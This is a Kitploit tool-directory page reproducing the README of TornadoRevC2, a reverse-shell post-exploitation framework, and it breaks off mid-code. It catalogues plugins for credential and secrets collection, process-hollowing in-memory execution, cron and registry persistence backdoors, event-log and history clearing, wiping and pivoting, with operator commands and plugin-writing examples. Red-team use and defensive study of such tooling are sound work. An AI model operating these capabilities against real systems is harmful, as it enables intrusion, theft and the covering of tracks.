Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
TornadoRevC2 — TCP/TLS/mTLS पर reverse-shell सत्रों को प्रबंधित करने वाला मॉड्यूलर post-exploitation फ्रेमवर्क, जिसमें enumeration, in-memory execution, SOCKS5 pivoting, और persistence के लिए प्लगइन्स हैं। | Kitploit
उपकरण/GitHubGitHub/kamalx06/tornadorevc2
भेद्यता परीक्षण फ्रेमवर्कविशेषाधिकार वृद्धिस्थायित्व तंत्रपार्श्व आंदोलनस्क्रिप्टिंग और स्वचालनजानकारी एकत्र करनापोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
247721घं 2मि पहलेKitploit द्वारा समीक्षित
GitHub
kamalx06/tornadorevc2

TornadoRevC2

TCP/TLS/mTLS पर reverse-shell सत्रों को प्रबंधित करने वाला मॉड्यूलर post-exploitation फ्रेमवर्क, जिसमें enumeration, in-memory execution, SOCKS5 pivoting, और persistence के लिए प्लगइन्स हैं।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

TornadoRevC2

अधिकृत सुरक्षा अनुसंधान, रेड-टीम संचालन और पेनेट्रेशन परीक्षण के लिए एक हल्का, मॉड्यूलर पोस्ट-एक्सप्लॉइटेशन फ्रेमवर्क। TornadoRevC2 एक एकीकृत ऑपरेटर कंसोल के माध्यम से Linux और Windows होस्ट पर रिवर्स शेल सत्रों का प्रबंधन करता है, होस्ट एन्यूमरेशन, स्थितिजन्य जागरूकता और परिचालन कार्यों के लिए क्रॉस-प्लेटफ़ॉर्म प्लगइन आर्किटेक्चर के साथ कोर सत्र हैंडलिंग का विस्तार करता है।

महत्वपूर्ण: TornadoRevC2 एक सत्र हैंडलर और पोस्ट-एक्सप्लॉइटेशन फ्रेमवर्क है—बीकन-शैली का कमांड-एंड-कंट्रोल प्लेटफ़ॉर्म नहीं। यह लगातार एजेंट इन्फ्रास्ट्रक्चर की तुलना में विश्वसनीय इंटरैक्टिव शेल, संरचित ऑपरेटर वर्कफ़्लो और ऑन-डिमांड प्लगइन निष्पादन को प्राथमिकता देता है।


कानूनी सूचना

इस सॉफ़्टवेयर का उपयोग केवल उन सिस्टमों पर करें जिनके आप स्वामी हैं या उन सिस्टमों पर जहाँ आपके पास स्पष्ट लिखित प्राधिकरण है। लागू कानूनों और संगठनात्मक नीतियों के अनुपालन की जिम्मेदारी पूरी तरह से आपकी है। लेखक और योगदानकर्ता इस परियोजना के उपयोग से उत्पन्न होने वाले दुरुपयोग, डेटा हानि या कानूनी परिणामों के लिए कोई दायित्व स्वीकार नहीं करते हैं।


डेमो

TornadoRevC2 Demo

त्वरित डेमो: सत्र प्रबंधन, प्लगइन निष्पादन, SOCKS5 पिवोटिंग।


विषय-सूची

  • परिचय
  • मुख्य विशेषताएँ
  • डिज़ाइन दर्शन
  • आर्किटेक्चर
  • आवश्यकताएँ और स्थापना
  • त्वरित शुरुआत
  • ऑपरेटर संदर्भ
  • अंतर्निहित प्लगइन
  • प्लगइन विकास
    • प्लगइन सिस्टम अवलोकन
    • प्लगइन स्थान
    • पंजीकरण
    • निष्पादन जीवनचक्र
    • पैटर्न 1: सरल शेल प्लगइन
    • पैटर्न 2: संरचित कलेक्टर
    • पैटर्न 3: कस्टम हैंडलर
    • Linux कलेक्टर
    • Windows कलेक्टर
    • JSON पेलोड परंपराएँ
    • कस्टम फ़ॉर्मेटर
    • प्लेटफ़ॉर्म-विशिष्ट प्लगइन
    • बाहरी प्लगइन
    • SessionContext API
    • त्रुटि प्रबंधन और रिटर्न कोड
    • सर्वोत्तम प्रथाएँ
    • संदर्भ कार्यान्वयन
  • सत्र लॉगिंग
  • परियोजना संरचना
  • TLS और mTLS कॉन्फ़िगरेशन
  • लाइसेंस

  • परिचय

    TornadoRevC2 एक मॉड्यूलर रिवर्स शेल प्रबंधन फ्रेमवर्क है जो सादे TCP, सर्वर-प्रमाणित TLS, और क्लाइंट-प्रमाणपत्र सत्यापन के साथ म्यूचुअल TLS (mTLS) पर इनबाउंड कनेक्शन स्वीकार करता है, जो सत्र प्रबंधन, होस्ट टोही, चंक्ड फ़ाइल स्थानांतरण, इन-मेमोरी पेलोड निष्पादन, SOCKS5 पिवोटिंग, प्लगइन-संचालित पोस्ट-एक्सप्लॉइटेशन, संरचित रिपोर्टिंग, और स्वचालित Git-आधारित अपडेट और निर्बाध हैंडलर पुनःआरंभ के लिए एक अंतर्निहित update कमांड के लिए एक एकीकृत ऑपरेटर कंसोल प्रदान करता है। मूल रूप से एक हल्के रिवर्स शेल हैंडलर के रूप में विकसित, यह परियोजना एक विस्तारणीय फ्रेमवर्क में विकसित हुई है जिसमें फ़ायरवॉल एन्यूमरेशन, क्रेडेंशियल स्टोर मेटाडेटा संग्रह, नेटवर्क मैपिंग, ब्राउज़र प्रोफाइलिंग, और अतिरिक्त पोस्ट-एक्सप्लॉइटेशन कार्यक्षमता जैसी क्षमताएँ स्वतंत्र, मॉड्यूलर प्लगइन के रूप में कार्यान्वित की गई हैं। फ्रेमवर्क में ऑपरेटर पक्ष से कमांड-लाइन टूल्स का उपयोग करके रिमोट प्रोटोकॉल (SSH, WinRM, SMB, RDP, WMI, MSSQL) के माध्यम से नए C2 सत्र स्थापित करने के लिए make_token प्लगइन भी शामिल है, जिसमें कस्टम पोर्ट, NTLM हैश प्रमाणीकरण, और netexec एकीकरण का समर्थन है, और एक upgrade_mtls प्लगइन जो हैंडलर के क्लाइंट प्रमाणपत्र बंडल को लक्ष्य पर पुश करके एक लाइव सत्र को म्यूचुअल-TLS लिसनर पर स्थानांतरित करता है।

    समर्थित लक्ष्य प्लेटफ़ॉर्म: Linux और Windows (प्राथमिक), जहाँ लागू हो वहाँ सामान्य Unix और BSD वातावरणों के लिए संगतता के साथ।


    मुख्य विशेषताएँ

    श्रेणीक्षमताएँ
    सत्र हैंडलिंगस्वचालित PKI बूटस्ट्रैपिंग के साथ मल्टी-क्लाइंट TCP / TLS / mTLS लिसनर · लाइव सत्रों के लिए ऑन-डिमांड mTLS अपग्रेड · इंटरैक्टिव PTY/TTY शेल · सत्र फ़िंगरप्रिंटिंग और पुनःकनेक्ट ट्रैकिंग
    फ़ाइल स्थानांतरणचंक्ड अपलोड और डाउनलोड · SHA-256 अखंडता सत्यापन
    पेलोड निष्पादनpy, ps, exe, elf, bat, और sh के लिए इन-मेमोरी निष्पादन
    पिवोटिंग और टनलिंगस्वचालित रिमोट क्लीनअप के साथ समझौता किए गए सत्रों के माध्यम से SOCKS5 प्रॉक्सी · बैकग्राउंड स्थायित्व के साथ Ligolo-NG और Chisel एजेंट तैनाती
    रिमोट सत्र स्थापनाmake_token — ऑपरेटर पक्ष से SSH, WinRM, SMB, RDP, WMI, और MSSQL पर नए सत्र स्थापित करें, NTLM हैश प्रमाणीकरण और netexec एकीकरण के साथ
    प्रतिरूपणrunas — किसी अन्य उपयोगकर्ता के रूप में कमांड निष्पादित करें या TLS-एन्क्रिप्टेड शेल स्पॉन करें, स्थानीय या रिमोट, डोमेन समर्थन और netexec एकीकरण के साथ
    एन्यूमरेशनहोस्ट ट्राइएज, नेटवर्क स्थिति, क्रेडेंशियल और ब्राउज़र मेटाडेटा, Kerberos टिकट, Linux आंतरिक, और Windows डोमेन और सिस्टम कॉन्फ़िगरेशन को कवर करना
    परिचालन प्लगइनमल्टी-पास सुरक्षित फ़ाइल वाइपिंग · हाइब्रिड फ़ाइल एन्क्रिप्शन · शेल इतिहास सफ़ाई · Windows इवेंट लॉग सफ़ाई
    स्थायित्वTLS-एन्क्रिप्टेड पेलोड का उपयोग करके क्रॉस-प्लेटफ़ॉर्म बैकडोर स्थापना — Linux/Unix पर cron @reboot, Windows पर Run रजिस्ट्री
    विस्तारणीयतारनटाइम प्लगइन लोड, रीलोड, और अनलोड · TORNADOREVC2_PLUGIN_DIR के माध्यम से बाहरी प्लगइन · प्रलेखित SessionContext API
    रिपोर्टिंगप्रति-सत्र लॉगिंग · संरचित प्लगइन आउटपुट · HTML ट्रांसक्रिप्ट निर्यात
    स्व-अपडेटरिपॉज़िटरी सत्यापन, फ़ास्ट-फ़ॉरवर्ड पुल, और स्वचालित हैंडलर पुनःआरंभ के साथ Git-आधारित update कमांड · फ़ोर्क-अनुकूल, विचलन पहचान और सुरक्षित रीसेट प्रॉम्प्ट के साथ

    समर्थित नहीं: कार्य शेड्यूलिंग, या बीकन-शैली कॉलबैक इन्फ्रास्ट्रक्चर।


    डिज़ाइन दर्शन

    TornadoRevC2 उन वातावरणों के लिए इंजीनियर किया गया है जहाँ तैनाती घर्षण और परिचालन पदचिह्न मायने रखते हैं।

    निर्भरता-हल्का, नेटिव-कमांड डिज़ाइन

    प्लगइन लक्ष्य होस्ट पर पहले से मौजूद नेटिव Windows और Linux उपयोगिताओं और अंतर्निहित सिस्टम कमांड का लाभ उठाते हैं—netsh, ss, iptables, ufw, firewall-cmd, nft, PowerShell cmdlets, nmcli, wevtutil, और अन्य। कलेक्टर रिवर्स शेल चैनल के माध्यम से इन टूल्स को आमंत्रित करते हैं और आउटपुट को रिमोट रूप से पार्स करते हैं, जिससे अतिरिक्त बाइनरी अपलोड करने या निर्भरताएँ स्थापित करने की आवश्यकता कम हो जाती है।

    लक्ष्य-पक्ष आर्टिफ़ैक्ट ड्रॉप नहीं

    प्लगइन संचालन मौजूदा रिवर्स शेल चैनल के माध्यम से निष्पादित होते हैं और लक्ष्य सिस्टम पर बाइनरी, निष्पादन योग्य, स्क्रिप्ट, या अस्थायी फ़ाइलें ड्रॉप करने की आवश्यकता नहीं होती। एन्यूमरेशन कार्य नेटिव कमांड या इन-प्रोसेस कलेक्टर स्क्रिप्ट के रूप में चलते हैं; परिणाम शेल पर चिह्नित JSON के रूप में लौटते हैं। एकमात्र अपरिहार्य आर्टिफ़ैक्ट शेल द्वारा स्वयं उत्पन्न सामान्य कमांड इतिहास है।

    सुगम क्षरण

    जब कोई एन्यूमरेशन रूटीन विफल होता है, अनुपलब्ध होता है, या टाइमआउट हो जाता है, तो प्लगइन पूरी तरह से निरस्त नहीं होता। प्रभावित अनुभाग खाली छोड़ दिया जाता है या N/A के रूप में चिह्नित किया जाता है जबकि रिपोर्ट का शेष भाग जारी रहता है।

    ऑपरेटर-पक्ष रखरखाव

    हैंडलर अपडेट ऑपरेटर मशीन पर Git के माध्यम से वितरित किए जाते हैं। update कमांड सीमित सबप्रोसेस टाइमआउट, गैर-इंटरैक्टिव Git सेटिंग्स, और एक तेज़ स्थानीय शटडाउन पथ का उपयोग करता है ताकि हैंडलर रिमोट सत्र क्लीनअप पर अवरुद्ध हुए बिना विश्वसनीय रूप से पुनःआरंभ हो सके।


    आर्किटेक्चर```text

    ┌─────────────────────────────────────────────────────────────────┐ │ Operator Console (handler) │ │ Sessions · Transfers · SOCKS · Plugins · Logging · Export · │ │ update │ └────────────────────────────┬────────────────────────────────────┘ │ reverse shell channel (TCP / TLS / mTLS) ▼ ┌─────────────────────────────────────────────────────────────────┐ │ Target Host │ │ Native commands · PowerShell · inline collectors │ │ T_PLUGIN_START + JSON + T_PLUGIN_END │ └─────────────────────────────────────────────────────────────────┘

    root@kitploit:~
    ### लिसनर कॉन्फ़िगरेशन
    
    TornadoRevC2 **एक साथ तीन स्वतंत्र लिसनर** चलाता है, ताकि इम्प्लांट engagement के थ्रेट मॉडल के आधार पर plaintext, server-authenticated TLS, या mutually authenticated TLS के ज़रिए कनेक्ट कर सकें:
    
    | लिसनर | डिफ़ॉल्ट पोर्ट | फ़्लैग | प्रमाणीकरण | प्रमाणपत्र |
    |----------|--------------|------|----------------|--------------|
    | TCP      | `4444`       | `-p` | कोई नहीं           | कोई नहीं |
    | TLS      | `8443`       | `-tp` | Server-authenticated | `tls_certs/server.pem`, `tls_certs/server.key` |
    | mTLS     | `9443`       | `-mp` | Mutual (client cert आवश्यक) | `mtls_certs/` बंडल (CA + server + client) |
    
    `-H` फ़्लैग तीनों लिसनरों द्वारा साझा किया जाने वाला bind address सेट करता है। तीनों को एक साथ सक्षम किया जा सकता है; किसी एक को अक्षम करना वर्तमान में आवश्यक नहीं है — इसे अनदेखा करने के लिए पोर्ट को खाली या unbound छोड़ दें।
    
    **स्वचालित प्रमाणपत्र जनरेशन।** पहले लॉन्च पर हैंडलर दो अलग-अलग डायरेक्टरी बनाता है और अपनी आवश्यक सामग्री को बूटस्ट्रैप करता है:```text
    tls_certs/
      server.pem          # self-signed server certificate
      server.key          # server private key
    
    mtls_certs/
      ca.pem              # mTLS certificate authority (self-signed, 4096-bit RSA)
      ca.key              # CA private key
      ca.srl              # OpenSSL serial counter (auto-generated)
      server-mtls.pem     # server cert signed by CA
      server-mtls.key     # server private key
      client.pem          # client cert signed by CA — ship to implant
      client.key          # client private key  — ship to implant
    

    प्लगइन लेआउट```text

    tornadorevc2/plugins/ shared/ Cross-platform plugins with internal Windows/Linux implementations linux/ Linux/Unix-only plugins and collector builders windows/ Windows-only plugins (rdp, services, eventlogdel, …) api.py SessionContext and @plugin.command registration manager.py Runtime loading, execution, and platform filtering loader.py Automatic module discovery

    root@kitploit:~
    **साझा प्लगइन्स** (`firewall`, `ports`, `browser`, `credstore`, और अन्य) `shared/` में एकल एकीकृत मॉड्यूल के रूप में मौजूद हैं। **प्लेटफ़ॉर्म-विशिष्ट प्लगइन्स** जैसे `rdp` और `eventlogdel` विशेष रूप से `windows/` या `linux/` के अंतर्गत रहते हैं और `shared/` में दोहराए नहीं जाते हैं।
    
    कलेक्टर्स मार्कर टोकन (`__T_PLUGIN_START__` / `__T_PLUGIN_END__`) में लिपटे JSON उत्सर्जित करते हैं। साझा रनर इस आउटपुट को पार्स करता है, ऑपरेटर-उन्मुख रिपोर्ट प्रारूपित करता है, और परिणामों को सत्र लॉग निर्देशिका के अंतर्गत संग्रहीत करता है।
    
    ---
    
    ## आवश्यकताएँ और स्थापना
    
    **हैंडलर (ऑपरेटर मशीन):**
    
    - Python 3.7 या बाद का संस्करण
    - OpenSSL (स्वचालित TLS और mTLS प्रमाणपत्र निर्माण के लिए)
    - Git (वैकल्पिक; `update` ऑपरेटर कमांड के लिए आवश्यक)
    - किसी तृतीय-पक्ष Python पैकेज की आवश्यकता नहीं है```bash
    git clone https://github.com/kamalx06/TornadoRevC2.git
    cd TornadoRevC2
    python3 tornadorevc2.py
    

    त्वरित शुरुआत

    1. हैंडलर शुरू करें```bash

    Default: TCP on 4444, TLS on 8443, mTLS on 9443

    python tornadorevc2.py

    Custom bind address and ports for all three listeners

    python tornadorevc2.py -H 0.0.0.0 -p 4444 -tp 8443 -mp 9443

    Point to your own certificate material

    python tornadorevc2.py
    -c tls_certs/server.pem -k tls_certs/server.key
    --mtls-ca-cert mtls_certs/ca.pem --mtls-ca-key mtls_certs/ca.key
    --mtls-server-cert mtls_certs/server-mtls.pem --mtls-server-key mtls_certs/server-mtls.key
    --mtls-client-cert mtls_certs/client.pem --mtls-client-key mtls_certs/client.key

    root@kitploit:~
    ### 2. एक सत्र स्थापित करें
    
    अंतर्निहित कैटलॉग (`payloads`) से एक रिवर्स शेल तैनात करें या अपना खुद का इम्प्लांट उपयोग करें। कनेक्ट होने पर, TornadoRevC2 एक सत्र ID असाइन करता है और `logs/` के अंतर्गत लॉगिंग शुरू करता है।
    
    ### 3. संचालन करें```bash
    status                          # List active sessions
    switch 1                        # Attach to session 1
    sysinfo 1                       # Collect host metadata
    run credstore 1                 # Credential store metadata
    run memorymap 1 1234            # Process memory maps (requires PID)
    run inmemory 1 sh ./linpeas.sh  # In-memory script execution
    update                          # Pull latest from GitHub and restart (Git installs)
    

    switch <ID> के माध्यम से attach करने पर, बाद के commands में session ID छोड़ दें (run quickenum 1 के बजाय run quickenum)। किसी client session के अंदर plugin listings और TAB completion उस session के platform के साथ compatible plugins तक filtered रहते हैं।

    update command केवल main handler prompt से उपलब्ध है। यह सत्यापित करता है कि Git installed है, पुष्टि करता है कि installation एक Git working tree है, configured remote से fetch करता है, updates मौजूद होने पर fast-forward pull करता है, और handler को उसी executable और arguments के साथ restart करता है। यदि installation पहले से ही current है, तो यह TornadoRevC2 is already running the latest version. print करता है और server को चलता रहने देता है।


    Operator Reference

    Session management

    CommandDescription
    status / lsList active reverse shell sessions
    sessionsShow tracked sessions, including disconnected hosts
    reconnectsDisplay session reconnect history
    switch <ID>Attach to an interactive session shell
    kill <ID>Terminate a session
    rename <ID> <name> / rn <ID> <name>Assign a friendly name
    sysinfo <ID> [--stealth|--full]Collect or refresh host information
    export <ID>Export an HTML session transcript

    Plugins

    CommandDescription
    plugins / plugins listList registered plugins
    plugins list --verboseShow module paths and load state
    plugins load <name>Load an external plugin at runtime
    plugins unload <name>Disable or unload a plugin
    plugins reload <name>Reload a plugin module
    plugins info <name>Display plugin metadata
    run <plugin> <ID> [args...]Execute a plugin against a session

    File transfer

    CommandDescription
    upload [--resume] <ID> <local> <remote>Upload with chunked transfer
    download [--resume] <ID> <remote> <local>Download with chunked transfer
    verify <ID> <remote> / hash <ID> <remote>Verify remote file size and SHA-256

    In-memory execution

    CommandDescription
    run inmemory <ID> <type> <local_file> [-- args] [--save-output <file>]Execute payload in memory

    Supported types: py, ps, exe, elf, bat, sh

    Network pivoting

    CommandIn-session formDescription
    socks <ID> <listen_port>socks <listen_port>Start a SOCKS5 proxy through a session (local listener on 127.0.0.1:<listen_port>)
    socks <ID> test <host> <port>socks test <host> <port>Test TCP reachability to an internal host through the tunnel agent
    socks <ID> resetsocks resetReset tunnel agent streams and discard buffered data (does not stop active SOCKS listeners)
    socks stop <proxy_id>socks stop <proxy_id>Stop a SOCKS proxy and clean up remote tunnel artifacts when no other proxy uses the session
    tunnelstunnelsList active SOCKS proxies, channel count, and status

    General

    CommandDescription
    payloadsDisplay the built-in payload reference
    updateCheck for updates from the official GitHub repository and restart after a successful fast-forward pull (requires Git; main menu only)
    helpShow the command reference
    exit / quitShut down the handler

    Built-in Plugins

    TornadoRevC2 51 built-in plugins के साथ आता है जो function के अनुसार व्यवस्थित हैं। सभी enumeration संबंधित plugins read-only हैं जब तक अन्यथा नोट न किया गया हो।

    Host assessment & environment

    PluginPlatformDescription
    quickenumCross-platformFast structured host triage: identity, network, environment, prioritized findings
    virtualizationCross-platformVirtualization, container, orchestration, and cloud environment detection
    kernelCross-platformKernel version, loaded modules/drivers, security mitigations, and kernel configuration
    integrityCross-platformSecure Boot, BitLocker/LUKS, code-signing enforcement, kernel lockdown, and integrity protections
    filesearchCross-platformSearch files by path, name, ext, size, owner, mtime (run filesearch help for options)
    packagesCross-platformInstalled software, package managers, repository configuration, and recent installs
    sysinfoCross-platformHost metadata collection (handler command, not a plugin)
    kerberosenumCross-platformKerberos ticket metadata: caches, default principal, realm, TGT, service tickets, encryption types, flags (renewable/forwardable), keytab files, krb5.conf/registry config, and environment variables (no secrets)

    Network & connectivity

    PluginPlatformDescription
    firewallCross-platformFirewall status, profiles/zones, policies, and notable rules (WDF, UFW, firewalld, nftables, iptables)
    portsCross-platformListening ports, established connections, owning processes, and routing
    proxyCross-platformSystem, environment, PAC/WPAD, and browser proxy settings
    vpnCross-platformVPN clients, active connections, adapters, and configuration metadata

    Credentials, browsers & applications

    PluginPlatformDescription
    credstoreCross-platformCredential store metadata (no secret extraction): Credential Manager, keyrings, browser stores
    browserCross-platformInstalled browsers, profiles, extensions, bookmarks, and enterprise policies
    clipboardCross-platformRemote clipboard text capture
    secretsLinux/UnixConfiguration files, environment variables, SSH keys, and cloud credentials

    Host internals

    PluginPlatformDescription
    historyCross-platformShell history, package/update logs, and recent login activity
    mountsCross-platformMount points, SMB/NFS shares, mapped drives, container filesystems
    memorymapCross-platformProcess memory maps and loaded modules for a specified PID
    screenshotCross-platformDesktop capture returned to the operator (GUI sessions; PNG saved locally)
    cronLinux/UnixCron jobs, system crontabs, user crontabs, and at queues
    systemdLinux/UnixServices, timers, failed units, and enabled startup units
    privbinsLinux/UnixSUID/SGID binaries, file capabilities, and privilege-escalation-relevant executables
    lsmLinux/UnixSELinux, AppArmor, and other Linux Security Modules: enforcement mode, policies, and configuration
    journalLinux/UnixStructured journalctl summaries: authentication, kernel, service failures, and recent events
    sshauditLinux/UnixSSH server enumeration: effective sshd config, auth surface, pivoting options, host keys, authorized_keys, and CA trust
    containersLinux/UnixContainer runtimes and workloads: Docker, Podman, containerd, CRI-O, LXC/LXD, and Kubernetes indicators
    usersessionsCross-platformActive local, remote, SSH, RDP, console, and service sessions with login/source metadata

    Windows domain & system

    PluginPlatformDescription
    adinfoWindowsDomain membership, domain controllers, forests, trusts, and OUs
    servicesWindowsWindows services, startup types, binaries, and service accounts
    scheduledtasksWindowsScheduled tasks, triggers, execution context, and actions
    registryWindowsAutorun keys, startup locations, and installed software
    eventlogsWindowsSecurity, System, Application, and PowerShell log summaries
    defenderWindowsMicrosoft Defender status, exclusions, ASR rules, and third-party AV
    certificatesWindowsCertificate stores, code-signing, and enterprise certificates
    rdpWindowsRemote Desktop configuration, status, recent targets, and settings
    gpoWindowsApplied GPOs, local/domain security policies, AppLocker, WDAC, SRP, and GPO scripts
    winrmWindowsWinRM configuration, listeners, authentication methods, firewall integration, and remoting status
    driversWindowsInstalled drivers and kernel modules, signed/unsigned status, startup type, and notable security/VM drivers
    powershellWindowsPowerShell version, execution policy, logging, modules, remoting settings, and profile paths
    lsaWindowsLSA protection, Credential Guard, virtualization-based security, and credential security configuration

    Execution & operational

    PluginPlatformDescription
    inmemoryCross-platformIn-memory payload execution (py, ps, exe, elf, bat, sh)
    make_tokenCross-platformEstablish C2 sessions via remote protocols (SSH, WinRM, SMB, RDP, WMI, MSSQL) using CLI tools from operator side with support for custom ports, NTLM hashes, and netexec integration
    nullcryptCross-platformHybrid encrypt a file (AES-GCM + RSA-wrapped key) then securely wipe the original via wiper
    wiperCross-platformConfigurable multi-pass secure overwrite (rename, truncate, delete); profiles: quick, standard, dod, thorough, shred
    historydelCross-platformClear current user shell history files and related storage
    eventlogdelWindowsClear Windows Event Logs via native wevtutil / Clear-EventLog
    runasWindowsExecute commands or spawn a TLS‑encrypted reverse shell as another user (local/remote) with credential management, domain support, and netexec integration
    ligolongCross‑platformDeploy Ligolo‑NG tunneling agent to Linux/Windows targets with background persistence
    chiselCross‑platformDeploy Chisel tunneling agent in reverse (client) or bind (server) mode; supports SOCKS5 and background persistence
    persistenceCross‑platformInstall a persistent reverse shell backdoor (cron @reboot / Run registry) using TLS‑encrypted payload
    upgrade_mtlsCross‑platformPush the handler's mTLS client bundle to a session and relaunch it over the mTLS listener (opt-in; does not affect other listeners)

    In-memory execution methods:

    TypeMethod
    pyPython via exec(compile(...))
    psPowerShell via Invoke-Expression
    exeWindows PE via in-memory RunPE (process hollowing)
    elfLinux ELF via memfd_create with /dev/shm fallback
    shShell script streamed via bash -s
    batBatch script streamed via cmd.exe /Q stdin

    PEASS-ng scripts for in-memory privesccheck: github.com/carlospolop/PEASS-ng


    Plugin Development

    यह section बताता है कि TornadoRevC2 को custom plugins के साथ कैसे extend करें। Plugins साधारण Python modules हैं जो @plugin.command के साथ commands register करते हैं और target session के लिए एक SessionContext प्राप्त करते हैं। Core handler code में किसी बदलाव की आवश्यकता नहीं है।

    Plugin system overview

    Plugin system में चार layers हैं:

    LayerModuleResponsibility
    Registrationplugins/api.py@plugin.command decorator, global command registry, SessionContext
    Discoveryplugins/loader.pyScans shared/, linux/, windows/, and external directories; imports modules
    Executionplugins/manager.pyResolves platform, builds context, invokes handler, handles errors
    Collectorsplugins/shared/runner.pyMarker parsing, JSON extraction, report formatting, logging

    Import time पर, @plugin.command decorator प्रत्येक handler को एक thread-safe global registry में register करता है। Runtime पर, PluginManager.run_plugin() platform compatibility validate करता है, एक SessionContext construct करता है, और handler को (session, args) के साथ call करता है।

    Handlers एक integer exit code return करते हैं: success के लिए 0, failure के लिए non-zero। Handler console non-zero returns के लिए warnings display करता है।

    Plugin placement

    Platform scope और यह कि plugin project के साथ ship होता है या नहीं, के आधार पर एक location चुनें:

    LocationScopeLoaded
    tornadorevc2/plugins/shared/Cross-platform (internal Windows + Linux implementations)Automatically at startup
    tornadorevc2/plugins/linux/Linux/Unix onlyAutomatically at startup
    tornadorevc2/plugins/windows/Windows onlyAutomatically at startup
    ./plugins/myplugin.pyExternal (any scope you define)On demand via plugins load
    ./plugins/myplugin/__init__.pyExternal packageOn demand via plugins load
    Path in TORNADOREVC2_PLUGIN_DIRExternal (custom directory)On demand via plugins load

    Layout rules:

    • shared/ के अंतर्गत common.py, runner.py, और __init__.py नाम की files discovery के दौरान skip की जाती हैं।
    • linux/ या windows/ के अंतर्गत _ से शुरू होने वाली files helper modules हैं, plugins नहीं।
    • Shared plugins shared/ में एक single module होना चाहिए जिसमें internal platform branching हो—cross-platform plugins को shared/ और linux//windows/ दोनों में duplicate न करें।
    • Platform-specific plugins (जैसे rdp, eventlogdel) विशेष रूप से windows/ या linux/ में होने चाहिए।

    Registration

    @plugin.command decorator के साथ एक command register करें:```python from tornadorevc2.plugins import plugin, SessionContext

    @plugin.command( name="myplugin", # Command name used with run myplugin <ID> platforms=["linux", "windows", "unix"], # Supported session platforms description="Short description for plugins list and TAB completion", ) def run(session: SessionContext, args): ... return 0 # 0 = success, non-zero = failure

    root@kitploit:~
    **प्लेटफ़ॉर्म मान:** `linux`, `windows`, `unix`। Linux और `unix` को संगत माना जाता है— `linux` के लिए पंजीकृत प्लगइन दोनों पर चलता है। यदि छोड़ा जाए तो डिफ़ॉल्ट: `["linux", "windows", "unix"]`।
    
    **प्रति मॉड्यूल कई कमांड:** एक ही फ़ाइल कई फ़ंक्शन्स पर `@plugin.command` लागू करके कई कमांड पंजीकृत कर सकती है। प्रत्येक को एक स्वतंत्र नाम मिलता है।
    
    ### निष्पादन जीवनचक्र
    
    जब कोई ऑपरेटर `run myplugin 1 arg1 arg2` चलाता है:```text
    1. PluginManager resolves session #1 and looks up "myplugin" in the registry
    2. Platform check: plugin.platforms vs session shell type (unix/windows)
    3. SessionContext(handler, client_socket) is constructed
    4. Handler invoked: run(ctx, ["arg1", "arg2"])
    5. Handler executes remote work via run_shell / run_marked / run_collector_plugin
    6. Output printed to operator console; results logged under logs/<session>/plugins/
    7. Exit code returned (0 = success)
    

    एक संलग्न सत्र के अंदर (switch <ID>), सत्र ID छोड़ दी जाती है और args प्लगइन नाम के तुरंत बाद शुरू होते हैं: run myplugin arg1 arg2।

    पैटर्न 1: सरल शेल प्लगइन

    इसका उपयोग तब करें जब आपको संरचित JSON पार्सिंग के बिना एक त्वरित एक-बार वाला कमांड चाहिए। हैंडलर एक नेटिव शेल कमांड चलाता है, आउटपुट प्रिंट करता है, और परिणाम लॉग करता है।```python from tornadorevc2.plugins import plugin, SessionContext

    @plugin.command( name="whoami", platforms=["linux", "windows", "unix"], description="Print remote user identity", ) def run(session: SessionContext, args): session.log_event("Plugin whoami: started")

    root@kitploit:~
    if session.is_windows:
        cmd = "whoami /all"
    else:
        cmd = "id 2>/dev/null || whoami"
    
    output = session.run_shell(cmd, timeout=10.0)
    if not output.strip():
        session.print("Plugin 'whoami' failed — no output from target.", "red")
        session.log_plugin_result("whoami", "", "no output")
        return 1
    
    report = output.strip()
    session.print(report, "cyan")
    session.log_plugin_result("whoami", report)
    session.log_command("run whoami", report)
    return 0
    
    root@kitploit:~
    **कब उपयोग करें:** सरल प्रोब, एक-पंक्ति गणना, ऐसे कमांड जिन्हें संरचित रिपोर्ट की आवश्यकता नहीं होती।
    
    **मुख्य विधियाँ:** `session.run_shell(cmd, timeout)`, `session.print(text, color)`, `session.log_plugin_result(name, report, detail='')`.
    
    ### पैटर्न 2: संरचित कलेक्टर (अनुशंसित)
    
    उन गणना प्लगइन्स के लिए उपयोग करें जो लक्ष्य पर संरचित डेटा एकत्र करते हैं और एक स्वरूपित रिपोर्ट लौटाते हैं। यह वही पैटर्न है जिसका उपयोग सभी अंतर्निहित रेकॉनिसेंस प्लगइन्स (`firewall`, `ports`, `browser`, आदि) करते हैं।
    
    **प्रवाह:**```text
    Handler                              Target host
      │                                       │
      ├─ session.log_event("started")         │
      ├─ flush shell buffer                   │
      ├─ resolve platform (unix/windows)      │
      ├─ build collector command/script ─────►│  Linux: inline Python or native shell
      │                                       │  Windows: PowerShell script in-process
      │                                       ├─ invoke native OS commands
      │                                       ├─ assemble result dict
      │                                       └─ emit __T_PLUGIN_START__ + JSON + __T_PLUGIN_END__
      │◄──────────────────────────────────────┤
      ├─ parse_collector_json(raw)            │
      ├─ formatter(data) → report string      │
      ├─ session.print(report)                │
      └─ session.log_plugin_result(...)       │
    

    न्यूनतम क्रॉस-प्लेटफ़ॉर्म उदाहरण:```python from tornadorevc2.plugins import plugin, SessionContext from tornadorevc2.plugins.linux._helpers import build_linux_collector_command from tornadorevc2.plugins.shared.common import format_generic_report from tornadorevc2.plugins.shared.runner import run_collector_plugin from tornadorevc2.constants import PLUGIN_MARK_END, PLUGIN_MARK_START

